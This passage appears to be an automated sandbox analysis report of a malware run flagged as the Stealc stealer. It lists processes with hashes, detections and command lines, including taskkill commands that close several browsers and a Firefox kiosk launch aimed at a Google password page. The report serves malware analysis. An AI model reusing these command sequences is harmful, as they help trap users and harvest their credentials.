                                                                                                                                                                                                                                                              MD5 hash:5DD5F67D25C20DFF1AC926ABDC8C2EB0
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                              • Detection: 24%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                              Start time:17:09:30
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                              Start time:17:09:30
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                              Start time:17:09:32
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                              Start time:17:09:32
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                              Start time:17:09:32
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                              Start time:17:09:32
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                              Start time:17:09:32
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                              Start time:17:09:32
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                              Start time:17:09:33
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                              Start time:17:09:33
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                              Start time:17:09:33
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                              Start time:17:09:33
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                              Start time:17:09:33
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                                              Start time:17:09:34
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -parentBuildID 20230927232528 -prefsHandle 2192 -prefMapHandle 2184 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55e86b5f-3953-4278-9a52-23c7c331b436} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba49c6e110 socket
                                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                                              Start time:17:09:35
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe"
                                                                                                                                                                                                                                                              Imagebase:0x680000
                                                                                                                                                                                                                                                              File size:1'799'168 bytes
                                                                                                                                                                                                                                                              MD5 hash:CBF2B84F9B993A77C0E2170CCCBACB7C
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000002.2760593914.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000003.2673057530.0000000005030000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                              Start time:17:09:38
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
                                                                                                                                                                                                                                                              Imagebase:0x670000
                                                                                                                                                                                                                                                              File size:2'895'872 bytes
                                                                                                                                                                                                                                                              MD5 hash:6CFAA4B02B026AA1631EDA2E570A1298
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                              • Detection: 45%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                              Start time:17:09:38
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4116 -parentBuildID 20230927232528 -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f1a1788-4a6a-4b44-adb8-7b34c81ea1a2} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba5bd78210 rdd
                                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                                              Start time:17:09:43
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
                                                                                                                                                                                                                                                              Imagebase:0x670000
                                                                                                                                                                                                                                                              File size:971'776 bytes
                                                                                                                                                                                                                                                              MD5 hash:5DD5F67D25C20DFF1AC926ABDC8C2EB0
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                                              Start time:17:09:46
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                              Start time:17:09:46
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                                              Start time:17:09:51
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
                                                                                                                                                                                                                                                              Imagebase:0x670000
                                                                                                                                                                                                                                                              File size:2'895'872 bytes
                                                                                                                                                                                                                                                              MD5 hash:6CFAA4B02B026AA1631EDA2E570A1298
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                                              Start time:17:09:53
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                                              Start time:17:09:54
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1944,i,17281856634279828374,9724014430205040748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                                              Start time:17:09:58
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                                              Start time:17:09:58
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,16142706175083674967,2684589522950696221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                                              Start time:17:09:58
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                                              Start time:17:09:59
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                                              Start time:17:09:59
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                                              Start time:17:09:59
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                                              Start time:17:09:59
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                                              Start time:17:09:59
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                                              Start time:17:09:59
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
                                                                                                                                                                                                                                                              Imagebase:0x670000
                                                                                                                                                                                                                                                              File size:971'776 bytes
                                                                                                                                                                                                                                                              MD5 hash:5DD5F67D25C20DFF1AC926ABDC8C2EB0
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                                                              Start time:17:10:00
